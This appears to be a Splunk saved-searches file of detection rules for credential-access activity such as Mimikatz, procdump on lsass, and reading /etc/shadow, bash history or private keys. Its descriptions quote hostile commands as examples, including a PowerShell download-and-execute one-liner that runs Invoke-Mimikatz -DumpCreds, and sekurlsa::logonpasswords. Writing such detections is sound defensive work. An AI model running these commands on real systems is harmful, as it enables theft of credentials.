[T1003: Powershell Invoke-Mimikatz Commandline]
search = sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" CommandLine="*Invoke-Mimi*" OR CommandLine="*-DumpCreds*" | table Computer,ParentImage,Image,CommandLine
description = Process event associated to Invoke-Mimikatz. \
example) powershell "IEX (New-Object Net.WebClient).DownloadString ('<url>');Invoke-Mimikatz -DumpCreds"\
References: https://attack.mitre.org/techniques/T1003/\
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md

[T1086: Mimikatz Credential Dumping Keywords Found]
search = source="WinEventLog:Microsoft-Windows-PowerShell/Operational" (ScriptBlockText="*mimikatz*" OR ScriptBlockText="*-DumpCreds*" OR ScriptBlockText="*privilege::debug*" OR ScriptBlockText="*sekurlsa::*")| table _time,Computer,ScriptBlockText
description = Mimikatz keywords found in Powershell Transcript Logs indicating potential credential access. \
example) mimikatz # privilege::debug\
mimikatz # sekurlsa::logonpasswords\
Invoke-Mimikatz -DumpCreds\
References: https://attack.mitre.org/software/S0002/\
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md

[TA0006: Credential Access: Mimikatz Executable Detected]
search = sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" Description="mimikatz for Windows" OR Company="gentilkiwi (Benjamin DELPY)" OR Image="*\\mimi*.exe" OR (IMPHASH=C90F45C0D58DFCF861DA592A1C318252 OR IMPHASH=D6BABC3862261C87CE2D504A3EB31724 OR IMPHASH=F0D0A258EF4645AABE53A8C67D59A6E0 OR IMPHASH=FCF758BDC8E91A946E344D06FD667418) | table Computer,ParentImage,Image,cmdline,Company,Description,MD5

[TA0006: Credential Access: Procdump Sysinternals Tool]
search = sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" Description="Sysinternals process dump utility" OR IMPHASH="FAD4245D83E8982F975B4B8F2F4D5719" OR Image=*\\procdump.exe OR Image=*\\procdump64.exe OR CommandLine="*-ma lsass*" | table host,User,ParentImage,Image,MD5

[TA0006: Credential Access: Grepping for Passwords]
search = sourcetype=cmdhistory bash "grep" "password" | table host,_raw

[TA0006: Credential Access: Private Keys]
search = sourcetype=cmdhistory bash "id_rsa" OR "authorized_keys"| table host,_raw

[TA0006: Credential Access: History / Bash_History]
search = index=* sourcetype=cmdhistory bash AND ("*.bash_history" OR "history")

[TA0006: Credential Access: Passwd/Shadow access]
search = index=* sourcetype=cmdhistory /etc/shadow OR /etc/passwd
